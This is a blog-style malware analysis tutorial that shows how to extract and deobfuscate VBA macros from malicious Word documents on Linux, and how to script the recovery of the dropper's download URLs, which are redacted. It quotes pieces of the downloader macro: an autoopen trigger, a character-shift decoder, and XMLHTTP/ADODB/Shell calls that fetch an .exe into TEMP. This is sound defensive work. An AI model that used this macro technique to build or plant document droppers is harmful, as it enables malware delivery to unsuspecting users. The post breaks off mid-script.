… and without touching Perl I might add. So, someone has just handed you a collection of Microsoft Word documents that they believe are malicious and you’re keen to investigate them to see if you can get your hands on some more malware to analyse. Here is how you can analyse Microsoft Word documents in a Linux environment, without using Microsoft Word (and without using Perl).
Before I start, I’ll apologise for the length of this post, but I kept finding more stuff that I could do.
Firstly, let’s see what we’ve got:
[code]
$ ls -l
total 1612
-rw-r–r– 1 malware musings 93184 Feb 2 13:23 copier@malwaremusings.com_20160129_084903(10).doc
-rw-r–r– 1 malware musings 93184 Feb 2 13:23 copier@malwaremusings.com_20160129_084903(11).doc
-rw-r–r– 1 malware musings 93184 Feb 2 13:23 copier@malwaremusings.com_20160129_084903(12).doc
-rw-r–r– 1 malware musings 101376 Feb 2 13:23 copier@malwaremusings.com_20160129_084903(13).doc
-rw-r–r– 1 malware musings 93184 Feb 2 13:23 copier@malwaremusings.com_20160129_084903(14).doc
-rw-r–r– 1 malware musings 101376 Feb 2 13:23 copier@malwaremusings.com_20160129_084903(15).doc
-rw-r–r– 1 malware musings 101376 Feb 2 13:24 copier@malwaremusings.com_20160129_084903(16).doc
-rw-r–r– 1 malware musings 93184 Feb 2 13:24 copier@malwaremusings.com_20160129_084903(17).doc
-rw-r–r– 1 malware musings 101376 Feb 2 13:24 copier@malwaremusings.com_20160129_084903(18).doc
-rw-r–r– 1 malware musings 93184 Feb 2 13:24 copier@malwaremusings.com_20160129_084903(19).doc
-rw-r–r– 1 malware musings 93184 Feb 2 13:21 copier@malwaremusings.com_20160129_084903(1).doc
-rw-r–r– 1 malware musings 93184 Feb 2 13:21 copier@malwaremusings.com_20160129_084903(3).doc
-rw-r–r– 1 malware musings 101376 Feb 2 13:22 copier@malwaremusings.com_20160129_084903(4).doc
-rw-r–r– 1 malware musings 93184 Feb 2 13:22 copier@malwaremusings.com_20160129_084903(5).doc
-rw-r–r– 1 malware musings 101376 Feb 2 13:22 copier@malwaremusings.com_20160129_084903(6).doc
-rw-r–r– 1 malware musings 93184 Feb 2 13:22 copier@malwaremusings.com_20160129_084903(8).doc
-rw-r–r– 1 malware musings 93184 Feb 2 13:23 copier@malwaremusings.com_20160129_084903(9).doc
[/code]
Right. Also notice that a number of them are the same size as each other, so they could be the same file. Let’s use SHA256 hashes to compare them:
[code]
$ sha256sum -b * |cut -d\ -f1 |sort |uniq -c
5 003837a453ab7dd0dda51804f4208b10009dc33a9a909e9689b82a1b993deea1
6 66ee53feafb8bd00d44cb5cb002fdf16298fa44d9925d25045ed8a61a2f9ff01
6 a9eb20b8bbaf117bb82725139188676c1a89811570c6d71e97a2baa7edc83823
[/code]
Okay. So we have three different files and roughly the same number of each. Let’s cull our collection a bit so that we only have unique files:
[code]
$ mkdir `sha256sum -b *.doc |cut -d\ -f1 |sort |uniq`
$ sha256sum -b *.doc |sort |sed ‘s/ \*/ /’ |while read hash filename; do
if [ "$hash" != "$prev" ]; then
mv -i "$filename" "$hash"/
prev="$hash"
fi
done
[/code]
There are two good tools, that I know of, for looking at Microsoft Office files, Didier Stevens’ oledump; and Decalage’s oletools. Oletools contains the olevba.py script which will do some useful analysis of the VB macro code, however it spits all of the VB code and analysis info out together. This is okay for reading through it and is, in fact, what I used the first time I did this work. Now that I know what I’m looking at, however, I’ll use Didier’s oledump.py which will allow me to extract the different pieces of macro code to separate files making it easier to script.
You could just as easily take either approach, but the oletools approach will need some manual (well, it could be scripted) work on its output file to be able to feed it in to the other commands below.
Moving on, let’s have a look at the first document (SHA256 hash 003837a453ab7dd0dda51804f4208b10009dc33a9a909e9689b82a1b993deea1):
[code]
$ oledump.py copier@malwaremusings.com_20160129_084903\(12\).doc
1: 113 ‘\x01CompObj’
2: 4096 ‘\x05DocumentSummaryInformation’
3: 4096 ‘\x05SummaryInformation’
4: 4096 ‘1Table’
5: 584 ‘Macros/PROJECT’
6: 119 ‘Macros/PROJECTwm’
7: 97 ‘Macros/UserForm1/\x01CompObj’
8: 291 ‘Macros/UserForm1/\x03VBFrame’
9: 131 ‘Macros/UserForm1/f’
10: 184 ‘Macros/UserForm1/o’
11: M 26055 ‘Macros/VBA/Module1’
12: M 28346 ‘Macros/VBA/Module2’
13: M 1277 ‘Macros/VBA/ThisDocument’
14: m 1160 ‘Macros/VBA/UserForm1’
15: 7836 ‘Macros/VBA/_VBA_PROJECT’
16: 1607 ‘Macros/VBA/__SRP_0’
17: 114 ‘Macros/VBA/__SRP_1’
18: 264 ‘Macros/VBA/__SRP_2’
19: 103 ‘Macros/VBA/__SRP_3’
20: 886 ‘Macros/VBA/dir’
21: 4142 ‘WordDocument’
[/code]
That output is telling us that items/streams 11 – 14 (inclusive) contain VB macro code. Let’s extract it:
[code]
$ oledump.py copier@malwaremusings.com_20160129_084903\(12\).doc |grep ": [Mm]" |tr -s " " |cut -d\ -f2,5 |tr -d "’:" |sed ‘s# .*/# #’ |while read stream file; do
/usr/local/oledump/oledump.py -s "$stream" -v copier@malwaremusings.com_20160129_084903\(12\).doc > "$file"
done
$ ls -l
total 140
-rw-r–r– 1 malware musings 93184 Feb 2 13:23 copier@malwaremusings.com_20160129_084903(12).doc
-rw-r–r– 1 malware musings 17262 Feb 14 13:21 Module1
-rw-r–r– 1 malware musings 18121 Feb 14 13:21 Module2
-rw-r–r– 1 malware musings 330 Feb 14 13:21 ThisDocument
-rw-r–r– 1 malware musings 342 Feb 14 13:21 UserForm1
[/code]
Okay, so we have four files (streams/items 11 – 14) containing VB macro code. UserForm1 is just Attribute statements setting various attributes, so we’ll leave that alone. ThisDocument also contains a few Attribute statements, but also contains a function called autoopen():
[code]
$ more ThisDocument
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
CargarFichProc "/"
End Sub
[/code]
That is how the macro code gets control: ‘When a document is opened, an AutoOpen macro runs if the AutoOpen macro is saved as part of that document or if the macro is saved as part of the template on which the document is based.’ (Description of behaviours of AutoExec and AutoOpen macros in Word).
The AutoOpen() (or autoopen() in this case — presumably Word isn’t case sensitive when it comes to identifier names) function calls the CargarFichProc() function with ‘/’ as a parameter. Let’s find where that function is defined:
[code]
$ grep "CargarFichProc" *
Binary file copier@malwaremusings.com_20160129_084903(12).doc matches
Module2:Public Sub CargarFichProc(NombreFichero As String)
ThisDocument:CargarFichProc "/"
[/code]
The function is defined in the Module2 code, and called from the code in ThisDocument (which we already knew as that is the file that we were just looking at).
Looking at Module2 and searching for the CargarFichProc() function, we see a lot of code which, at first glance, doesn’t appear to be doing anything useful (or to put it another way, ‘beating about the bush’ as we say in this neck of the woods — a bit like I’m doing in these parenthesis):
[code]
Public Sub CargarFichProc(NombreFichero As String)
Dim f As Integer
Dim Buffer As String
Dim Cadena As String
Dim i As Integer
Dim Aux As Integer
Dim Fallo As Boolean
Fallo = False
bHayNORMA = False
bHayNORMAC = False
bHaySNIFTD = False
bHayEXPAND = False
bHaySFIFT = False
bHayCNIFT = False
bHayPNIFT = False
bHayPNIFU = False
bHayFrecs = False
GoTo perd
For i = 0 To UBound(sProc) Step 1
sProc(i) = Unchecked
Next i
sProc(0) = CharSinCargar
sProc(3) = CharSinCargar
For i = 0 To UBound(sSNIFTD_EXPAND) Step 1
sSNIFTD_E.XPAND(i) = CharSinCargar
Next i
sSNIFTD_E.XPAND(10) = Unchecked
For i = 0 To UBound(sSFIFT) Step 1
sSF.IFT(i) = CharSinCargar
Next i
[/code]
It just so happens that I’ve seen VB code do this before, and after spending ages tracing through it all to figure out what a number of the functions did, I started tracing execution from the AutoOpen() function and realised that a lot of the code is skipped by using GoTo statements, or other control flow statements, and never actually runs!
Now I notice in that extract of CargarFichProc() shown above, that there is a ‘GoTo perd’ statement. Let’s do a test and display all of the lines that either contain a GoTo statement, or a label:
[code]
$ cat Module2 |tr -d "\015" |grep "^[ ]*GoTo\|:$"
GoTo perd
perd:
GoTo perd1
SalirCargarProc:
ManipularErrorCargarProc:
perd1:
GoTo perd
perd:
GoTo perd2
perd2:
GoTo perd3
perd3:
GoTo perd4
SalirCargarProc:
ManipularErrorCargarProc:
perd4:
[/code]
Note the use of the tr(1) command to delete carriage return characters (character 13, or \015 — 13 decimal is 15 octal). We need to do this because these files came from a Windows environment which uses a subtly different end-of-line convention to UNIX. Windows (and MS-DOS) ends lines with two characters — a carriage return (ASCII character 13) and a line feed (ASCII character 10). UNIX, on the other hand, ends lines with a single line feed character.
Consequently UNIX doesn’t recognise a CR character as the end of a line, but as just another character on the line, so it sees a number of lines with a CR character as the last character on each line. This means that when we ask grep to show us lines ending in ‘:’, it doesn’t show anything because as far as grep is concerned the lines have a CR character on the end of them, not a ‘:’ character.
Since all of those labels appear after their corresponding GoTo statements in the VB file, we can take one of two approaches here. We can open the file in a text editor and scroll through it deleting the lines in between each GoTo statement and its corresponding label, or we can take the more interesting approach and try to script it. Again, we’re using tr(1) to remove the carriage return (CR) characters. Scripting it will help us if we see more of this type of file, like if the other two Word documents that we have to look at do a similar thing:
[code]
$ cat Module2 |tr -d "\015" |awk ‘
/^[ ]*GoTo[ ]/ {
# goto statement — extract label
dstlabel = $2;
dontprint = 1;
}
(dontprint == 0) {
print;
}
/:$/ {
# found label
label = $0;
sub(":$","",label);
if (label == dstlabel) dontprint = 0;
}
‘ > Module2.tidy
$ ls -l Module2*
-rw-r–r– 1 malware musings 18121 Feb 14 13:21 Module2
-rw-r–r– 1 malware musings 2077 Feb 14 18:50 Module2.tidy
[/code]
As you can see, that has drastically reduced the size of that VB macro file!
Let’s just set that aside for the moment, and run the same tidying up script on Module1. If we repeat the above set of commands on Module1 we get:
[code]
$ ls -l Module1*
-rw-r–r– 1 malware musings 17262 Feb 14 13:21 Module1
-rw-r–r– 1 malware musings 5984 Feb 14 18:53 Module1.tidy
[/code]
Having a quick browse through Module1.tidy we see a few key things:
[code]
i = MsgBox("No se pudo guardar el fichero correctamente." & _
vbNewLine & sPathProceso, _
vbOKOnly + vbCritical, "ERROR PROCESADO DE INCERTIDUMBRES")
…
Public Sub ValidarProc(NombreFichero As String)
[/code]
Plus a few other things that look like validation and error printing code. Let’s have a bit of fun and plug that error message in to a language guessing web site shall we? I reckon it sounds like Spanish, or something like that.
Google Translate has translated the first sentence from that MsgBox() statement to ‘Could not save the file correctly‘, and also believes it to be Spanish.
Now that we’ve got that out of the way, let’s go back to Module2 (which contains the function called from the autoopen() function) and see what else we want to try and work out.
A quick scan shows a few interesting things. We have a function, AddFieldToField(Variant,Integer), that is performing some calculation inside a loop and then returning the result. We have some object creation going on, an Array of integers, a call to AddFieldToField(), the name of a .exe file, and some interesting sounding function calls:
[code]
Public Function AddFieldToField(ShaBADA1_9() As Variant, ShaBADA1_10 As Integer) As String
Dim ShaBADA1_8 As Integer
Dim uncunctunc2_1 As String
uncunctunc2_1 = ""
For ShaBADA1_8 = LBound(ShaBADA1_9) To UBound(ShaBADA1_9)
uncunctunc2_1 = uncunctunc2_1 & Chr(ShaBADA1_9(ShaBADA1_8) – 8854 – ShaBADA1_10 – 500 – 3 * ShaBADA1_10 – 500)
Next ShaBADA1_8
AddFieldToField = uncunctunc2_1
End Function
…
Set ShaBADA1_1 = CreateObject(mandata(0))
Set ShaBADA1_2 = CreateObject(mandata(1))
Set ShaBADA1_6 = CreateObject(mandata(2))
Set hokuk = CreateObject(mandata(3))
Set ShaBADA1_3 = hokuk.Environment(mandata(4))
Dim ShaBADA1_7() As Variant
ShaBADA1_7 = Array(10138, 10150, 10150, 10146, 10092, 10081, 10081, 10094, 10138, 10139, 10134, 10134, 10135, 10144, 10096, 10080, 10133,
10145, 10143, 10081, 10151, 10087, 10088, 10137, 10136, 10084, 10134, 10081, 10141, 10089, 10088, 10140, 10087, 10138, 10137, 10080, 101
35, 10154, 10135)
ShaBADA1_1.Open mandata(5), AddFieldToField(ShaBADA1_7, 45), False
ShaBADA1_1.Send
ShaBADA1_4 = ShaBADA1_3(mandata(6))
ShaBADA1_5 = ShaBADA1_4 + "\perdoma.exe
[/code]
My guess would be that the Array of integers is hiding something. Especially when the next line passes the Array to AddFieldToField(), which is a function (don’t let the name throw you — it’s not really a field) that performs calculations within a loop and returns a value. Is AddFieldToField() a deobfuscation function?
That loop inside AddFieldToField() looks like a classic string indexing loop that is performing a calculation on each character of a string, which is just what it would need to do to turn that Array of integers in to something more meaningful. Let’s look in to it.
I’m going to try to save a bit of time by assuming that LBound() and UBound() return the lower and upper indexes in to the string that they are passed, as that would match what I’m expecting the loop to be doing (grabbing each character of the string). If that doesn’t work out for us, then I’ll go back and see what LBound() and UBound() actually do.
[code]
uncunctunc2_1 = ""
For ShaBADA1_8 = LBound(ShaBADA1_9) To UBound(ShaBADA1_9)
uncunctunc2_1 = uncunctunc2_1 & Chr(ShaBADA1_9(ShaBADA1_8) – 8854 – ShaBADA1_10 – 500 – 3 * ShaBADA1_10 – 500)
Next ShaBADA1_8
[/code]
That For loop then is taking each character from the string passed to AddFieldToField() (ShaBADA1_9) in turn, performing a calculation, and appending the result to an output string (uncunctunc2_1) which was initially the empty string.
Let’s take the first integer from the Array (10138) and do the same calculation substituting the second parameter passed to AddFieldToField() (45) for ShaBADA1_10, and see what we get:
[code]
$ expr 10138 – 8854 – 45 – 500 – 3 \* 45 – 500
104
[/code]
Smashing — that is within the range of 65 (ASCII code for ‘A’) + 32 (difference between upper case characters and lower case characters — bit 5), namely 97, and 97 + 26 (the number of letters in the alphabet). Hence it looks like a lower case letter of the alphabet. Checking the ascii(7) man page (to save counting letters) we see that it is a ‘h’ character. Looking promising. Let’s work on extracting the integers from the Array:
[code]
$ grep "Array" Module2.tidy |sed ‘s/.*(\(.*\))/\1/’
10138, 10150, 10150, 10146, 10092, 10081, 10081, 10094, 10138, 10139, 10134, 10134, 10135, 10144, 10096, 10080, 10133, 10145, 10143, 10081, 10151, 10087, 10088, 10137, 10136, 10084, 10134, 10081, 10141, 10089, 10088, 10140, 10087, 10138, 10137, 10080, 10135, 10154, 10135
[/code]
and remove the commas with our good friend tr(1) again:
[code]
$ grep "Array" Module2.tidy |sed ‘s/.*(\(.*\))/\1/’ |tr -d ","
10138 10150 10150 10146 10092 10081 10081 10094 10138 10139 10134 10134 10135 10144 10096 10080 10133 10145 10143 10081 10151 10087 10088 10137 10136 10084 10134 10081 10141 10089 10088 10140 10087 10138 10137 10080 10135 10154 10135
[/code]
Splendid — we now have a list of integers to perform the calculation on. Now we could potentially do the calculation using the expr(1) command, like we did above, but then we’d have to dick around and convert the output to octal and backslash escape it, then convince an echo command to translate the backslash escapes.
An easier approach is to use awk(1), as it can do the calculation and output the characters for us:
[code]
$ grep "Array" Module2.tidy |sed ‘s/.*(\(.*\))/\1/’ |tr -d "," |awk ‘
{
for (i = 1;i <= NF;i++) {
printf("%c",$i – 8854 – 45 – 500 – 3 * 45 – 500);
}
printf("\n");
}’
http://<hidden>.com/u56gf2d/k76j5hg.exe
[/code]
Bingo — I don’t know about you, but I’d now be expecting this macro to initiate a download from that (well, the original one) URL.
After repeating the oledump VB macro code extraction and tidying up commands on the other two Word documents, we can do a quick check to see if they have the same macro code in them:
[code]
$ sha256sum -b */Module1
4cf89352fb49ab1fb96da826d72d4add50ac78b3edf5a701129cc8eb92c2d86c *003837a453ab7dd0dda51804f4208b10009dc33a9a909e9689b82a1b993deea1/Module1
09ee2e21efe038b230f685ac737d6aac5b380293146322004200cf6472a70a15 *66ee53feafb8bd00d44cb5cb002fdf16298fa44d9925d25045ed8a61a2f9ff01/Module1
4cf89352fb49ab1fb96da826d72d4add50ac78b3edf5a701129cc8eb92c2d86c *a9eb20b8bbaf117bb82725139188676c1a89811570c6d71e97a2baa7edc83823/Module1
$ sha256sum -b */Module2
10cd806fb2b3717e549fb017dd711f4d49fb8bfe340746cc39039d3495fdc225 *003837a453ab7dd0dda51804f4208b10009dc33a9a909e9689b82a1b993deea1/Module2
2c9db80504019c584c6c687ca861244cef3be0ffb0eaaf6259570ae5f56f94fd *66ee53feafb8bd00d44cb5cb002fdf16298fa44d9925d25045ed8a61a2f9ff01/Module2
60ac3e8e06b1c8019f63ea2ab7116216b0b3635d45ec485e74a87d8c79f8d1fb *a9eb20b8bbaf117bb82725139188676c1a89811570c6d71e97a2baa7edc83823/Module2
[/code]
No they don’t. The next obvious question then, is how do they differ?:
[code]
$ diff 003837a453ab7dd0dda51804f4208b10009dc33a9a909e9689b82a1b993deea1/Module1 66ee53feafb8bd00d44cb5cb002fdf16298fa44d9925d25045ed8a61a2f9ff01/Module1
622a623,624
>
>
$ diff 003837a453ab7dd0dda51804f4208b10009dc33a9a909e9689b82a1b993deea1/Module2 66ee53feafb8bd00d44cb5cb002fdf16298fa44d9925d25045ed8a61a2f9ff01/Module2
495,496c495,496
< ShaBADA1_7 = Array(10138, 10150, 10150, 10146, 10092, 10081, 10081, 10094, 10138, 10139, 10134, 10134, 10135, 10144, 10096, 10080, 10133, 10145, 10143, 10081, 10151, 10087, 10088, 10137, 10136, 10084, 10134, 10081, 10141, 10089, 10088, 10140, 10087, 10138, 10137, 10080, 10135, 10154, 10135)
< ShaBADA1_1.Open mandata(5), AddFieldToField(ShaBADA1_7, 45), False
—
> ShaBADA1_7 = Array(10146, 10158, 10158, 10154, 10100, 10089, 10089, 10102, 10146, 10147, 10142, 10142, 10143, 10152, 10104, 10088, 10142, 10143, 10089, 10159, 10095, 10096, 10145, 10144, 10092, 10142, 10089, 10149, 10097, 10096, 10148, 10095, 10146, 10145, 10088, 10143, 10162, 10143)
> ShaBADA1_1.Open mandata(5), AddFieldToField(ShaBADA1_7, 47), False
653a654,655
>
>
$ diff 66ee53feafb8bd00d44cb5cb002fdf16298fa44d9925d25045ed8a61a2f9ff01/Module1 a9eb20b8bbaf117bb82725139188676c1a89811570c6d71e97a2baa7edc83823/Module1
623,624d622
<
<
$ diff 66ee53feafb8bd00d44cb5cb002fdf16298fa44d9925d25045ed8a61a2f9ff01/Module2 a9eb20b8bbaf117bb82725139188676c1a89811570c6d71e97a2baa7edc83823/Module2
495,496c495,496
< ShaBADA1_7 = Array(10146, 10158, 10158, 10154, 10100, 10089, 10089, 10102, 10146, 10147, 10142, 10142, 10143, 10152, 10104, 10088, 10142, 10143, 10089, 10159, 10095, 10096, 10145, 10144, 10092, 10142, 10089, 10149, 10097, 10096, 10148, 10095, 10146, 10145, 10088, 10143, 10162, 10143)
< ShaBADA1_1.Open mandata(5), AddFieldToField(ShaBADA1_7, 47), False
—
> ShaBADA1_7 = Array(10118, 10130, 10130, 10126, 10072, 10061, 10061, 10074, 10118, 10119, 10114, 10114, 10115, 10124, 10076, 10060, 10125, 10128, 10117, 10061, 10131, 10067, 10068, 10117, 10116, 10064, 10114, 10061, 10121, 10069, 10068, 10120, 10067, 10118, 10117, 10060, 10115, 10134, 10115)
> ShaBADA1_1.Open mandata(5), AddFieldToField(ShaBADA1_7, 40), False
654,655d653
<
<
[/code]
Apart from the second sample having a couple of extra blank lines in it, Module1 doesn’t differ.
Module2 however, does differ, but only by a couple of lines (again ignoring the extra blank lines in the second sample), namely the Array line and the call to AddFieldToField() call. Those differences are only changes to the integers used in the Array and in the second parameter to AddFieldToField() (the second parameter, remember, was used in the deobfuscation calculation).
You know, I reckon we could automate this. We need to grab the line declaring the Array, and also the call to AddFieldToField(). It turns out that a simple grep Array command is enough to extract only the Array declaration. If, however, we try grep AddFieldToField( then we’ll also get the function declaration, which we don’t want:
[code]
$ grep "AddFieldToField(" Module2.tidy
Public Function AddFieldToField(ShaBADA1_9() As Variant, ShaBADA1_10 As Integer) As String
ShaBADA1_1.Open mandata(5), AddFieldToField(ShaBADA1_7, 45), False
[/code]
Let’s refine that a tad. We can see that the call to AddFieldToField() is preceded by a ‘.Open’ (a call to the Open method of some object). Let’s use that to extract only the AddFieldToField() call (we won’t use the object name as that is likely to have been pseudo-randomly generated to make it different in other documents), and then combine those two regular expressions in to one grep(1) command:
[code]
$ grep "Array\|Open.*AddFieldToField(" Module2.tidy
ShaBADA1_7 = Array(10138, 10150, 10150, 10146, 10092, 10081, 10081, 10094, 10138, 10139, 10134, 10134, 10135, 10144, 10096, 10080, 10133, 10145, 10143, 10081, 10151, 10087, 10088, 10137, 10136, 10084, 10134, 10081, 10141, 10089, 10088, 10140, 10087, 10138, 10137, 10080, 10135, 10154, 10135)
ShaBADA1_1.Open mandata(5), AddFieldToField(ShaBADA1_7, 45), False
[/code]
Brilliant. That gets us the two lines (and only the two lines) that we wanted. Now to get the pertinent data in to a format that we can feed to awk(1) to do the calculating and printing.
[code]
$ grep "Array\|Open.*AddFieldToField(" Module2.tidy |sed ‘/Array(/N;s/.*Array(\([^)]*\))\n.*AddFieldToField([^,]*, *\([0-9]*\).*/\1 \2/;s/, */ /g’
10138 10150 10150 10146 10092 10081 10081 10094 10138 10139 10134 10134 10135 10144 10096 10080 10133 10145 10143 10081 10151 10087 10088 10137 10136 10084 10134 10081 10141 10089 10088 10140 10087 10138 10137 10080 10135 10154 10135 45
[/code]
Now I’m thinking that I should probably explain that sed(1) command! It is really three sed(1) commands separated by a ‘;’. If we break them out then I can explain each sed(1) command separately.
[code]
/Array(/N
s/.*Array(\([^)]*\)).*AddFieldToField([^,]*, *\([0-9]*\).*/\1 \2/;s/, */ /g
s/, */ /g
[/code]
The first line applies the ‘N’ command (append the next line of input to the pattern space) to any line that matches the regular expression ‘Array(‘. This works because we only have two lines of input from grep(1), and they are always in the same order — the Array declaration and then the function call — and what it does is it appends the line containing the function call to the line containing the Array declaration, after inserting an embedded newline character (the ‘\n’ that you can see in the ‘s’ command).
The second line is the sed(1) ‘s’ command (substitute), and that is applied to the pattern space (a sed(1) construct — man sed for more information) which is now the Array declaration line followed by an embedded newline character and the line containing the AddFieldToField() call.
The ‘s’ command removes everything before the ‘Array(‘ part of the Array declaration, everything between the ‘)’ ending the Array declaration and the ‘AddFieldToField(‘ text at the start of the AddFieldToField() call. Note that this includes the embedded newline inserted by the ‘N’ command.
Now, I didn’t think that ‘.’ would match the embedded newline and that it had to be matched explicitly with a ‘\n’. This is making me wonder if this behaviour (a ‘.’ matching an embedded newline) is a GNU extension, because the above sed(1) command still works without it. I’ve left it in because I’m reasonably sure that some sed(1) commands (for instance, sed(1) on Solaris) require the embedded newline to be explicitly matched with a ‘\n’.
The ‘\([^)]*\)’ construct inside the Array declaration will match zero or more (‘*’) characters (‘[…]’) that aren’t (‘^’) a closing parenthesis (‘)’) — that is, it’ll match the integers, commas, and spaces in between the ‘()’ in the Array(…) statement.
The ‘[^,]*,’ construct matches the first parameter (zero or more occurrences of a non ‘,’ character, followed by a ‘,’) to AddFieldToField(), with the ‘\([0-9]*\)’ matching the second parameter (zero or more occurrences of a digit). The outer escaped (‘\’) parenthesis allow us to reference the enclosed matching text on the right hand side by using \1, \2, \3, etc., because like the integers in the Array declaration, we want to keep this text.
So the whole pattern space is then replaced with the values represented by \1 and \2, which are the grouped (between the ‘\(‘ and ‘\)’) regular expressions on the left hand side (the text between the first and second ‘/’ characters) of the ‘s’ command. In this case they represent the string of integers in the Array declaration, and the integer passed to the AddFieldToField() function — everything that we need to deobfuscate the Array — and they are now the entire contents of the pattern space.
The third sed(1) command simply removes any comma and superfluous (more than one) spaces from between integers. This tidies the data up so that we can post-process it more easily. Speaking of which, here’s the moment that you’ve all been waiting for — the deobfuscation (it’s like the part at the end of Scooby Doo episodes where they unmask the villain, who would then inevitably exclaim that they would have got away with it if it hadn’t been for those meddling kids).
Now that we have our Array integers and the second parameter passed to the AddFieldToField() call, we can perform the calculation from the original VB script and spit the deobfuscated string out character by character. Let’s take what we have so far, and add an awk(1) script on the end to take the data output from sed(1), perform the deobfuscation calculation, and spit out the result:
[code]
$ grep "Array\|Open.*AddFieldToField(" Module2.tidy |sed ‘/Array(/N;s/.*Array(\([^)]*\))\n.*AddFieldToField([^,]*, *\([0-9]*\).*/\1 \2/;s/, */ /g’ |awk ‘
{
for (i = 1;i < NF;i++) {
printf("%c",$i – 8854 – $NF – 500 – 3 * $NF – 500);
}
printf("\n");
}’
http://<hidden>.com/u56gf2d/k76j5hg.exe
[/code]
… and thankfully it is the same as when we extracted it manually earlier.
Now that we have scripted the extraction and deobfuscation methods we can run the same script on the other samples by returning to the directory in which we created a subdirectory per sample to extract the macro code:
[code]
$ grep "Array\|Open.*AddFieldToField(" */Module2.tidy |sed ‘/Array(/N;s/.*Array(\([^)]*\))\n.*AddFieldToField([^,]*, *\([0-9]*\).*/\1 \2/;s/, */ /g’ |awk ‘
{
for (i = 1;i < NF;i++) {
printf("%c",$i – 8854 – $NF – 500 – 3 * $NF – 500);
}
printf("\n");
}’
http://<hidden>.com/u56gf2d/k76j5hg.exe
http://<hidden>.de/u56gf2d/k76j5hg.exe
http://<hidden>.org/u56gf2d/k76j5hg.exe
[/code]
Now, to make it even more useful, let’s put the whole lot together. That way we can just pass it similar Word documents and have it extract URLs for us. Here’s a complete script:
[code]
#!/bin/sh
seq=0
for docfile in $*; do
SHA256="`sha256sum -b \"$docfile\" |cut -d\ -f1`"
TMPDIR="$SHA256-`date ‘+%s’`-$$-$seq"
seq="`expr $seq + 1`"
mkdir "$TMPDIR"
oledump.py "$docfile" |grep ": [Mm]" |tr -s " " |cut -d\ -f2,5 |tr -d "’:" |sed ‘s# .*/# #’ |while read stream file; do
/usr/local/oledump/oledump.py -s "$stream" -v "$docfile" > "$TMPDIR/$file"
done
for f in "$TMPDIR"/*; do
if grep "Array\|Open.*AddFieldToField(" "$f" > /dev/null; then
cat "$f" |tr -d "\015" |awk ‘
/^[ ]*GoTo[ ]/ {
# goto statement — extract label
dstlabel = $2;
dontprint = 1;
}
(dontprint == 0) {
print;
}
/:$/ {
# found label
label = $0;
<pre class="container"> sub(":$","",label);
if (label == dstlabel) dontprint = 0;
}
‘ > "${f}.tidy"
grep "Array\|Open.*AddFieldToField(" "${f}.tidy" |sed ‘/Array(/N;s/.*Array(\([^)]*\))\n.*AddFieldToField([^,]*, *\([0-9]*\).*/\1 \2/;s/, */ /g’ |awk ‘
{
for (i = 1;i < NF;i++) {
printf("%c",$i – 8854 – $NF – 500 – 3 * $NF – 500);
}
printf("\n");
}’
fi
done
done
[/code]
The script contains some extra code at the beginning to generate a unique directory name to store the extracted macros in, but apart from that it is pretty much the same as the script snippets presented throughout this post. There is a loop wrapped around the whole script to allow processing of multiple files (specify multiple file names on the command line):
[code]
$ ./extracturls.sh *.doc
copier@malwaremusings.com_20160129_084903(11).doc: http://<hidden>.org/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(14).doc: http://<hidden>.org/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(15).doc: http://<hidden>.de/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(16).doc: http://<hidden>.de/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(17).doc: http://<hidden>.com/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(18).doc: http://<hidden>.de/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(19).doc: http://<hidden>.com/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(1).doc: http://<hidden>.org/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(3).doc: http://<hidden>.org/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(4).doc: http://<hidden>.de/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(5).doc: http://<hidden>.org/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(6).doc: http://<hidden>.de/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(8).doc: http://<hidden>.com/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(9).doc: http://<hidden>.com/u56gf2d/k76j5hg.exe
[/code]
We could even get it to output the SHA256 hash (it is calculating it anyway to create the temporary directory) of each document too, as you could then match the document up with an output directory and have a look at the macro code contained therein. This post is getting quite long though, so I’ll leave that as an exercise for the reader.
Just before I finish though, if you look back through the macro code, you’ll see references to a mandata[] array (except Visual Basic uses ‘()’ to index an array rather than ‘[]’, but if I do that, it’ll look like a function), and since it is passed as a parameter to functions like CreateObject(), it would be handy to know what the contents of the array are.
Right near the top of the macro code we have:
[code]
Public Sub CargarFichProc(NombreFichero As String)
…
mandata = Split(UserForm1.ComboBox1.Text, NombreFichero)
…
End Sub
[/code]
You’ll also remember seeing the following in the ThisDocument stream:
[code]
Sub autoopen()
CargarFichProc "/"
End Sub
[/code]
So the mandata[] array is created by Split()ing UserForm1.ComboBox1.Text on the ‘/’ character. At this point I thought I was a tad stuck and was going to have to open the document in Word… but then I had a thought — what if we check the Word document for strings. Since the Split() function is splitting the string on a ‘/’ character, we can probably use grep(1) to limit the output to strings containing a ‘/’:
[code]
strings copier@malwaremusings.com_20160129_084903\(13\).doc |grep "/"
…
_B_var_sCN/
_B_var_PrefLINX/K0
_B_var_ClavePNIFU/s0
Microsoft.XMLHTTP/Adodb.Stream/Shell.Application/WScript.Shell/Process/GET/TEMP/Type/Open/write/responseBody/savetofile/
Document=ThisDocument/&H00000000
[/code]
What is that I see on line 6? A number of strings which look like they want to be passed to a CreateObject() function! Note that if you are curious and want to know where the string was actually stored within the Word document CDF file, you can unzip the CDF file using the 7z(1) command and find the string in the file ./Macros/UserForm1/o. This could be handy to know for scripting the extraction of such form data in the future.
Quickly then, because it’s past my dinner time and I’m getting hungry, here’s a script that generates a sed(1) script to change the mandata[] array references in the Module2.tidy file (created above) to the strings extracted from the Word document:
[code]
idx=0
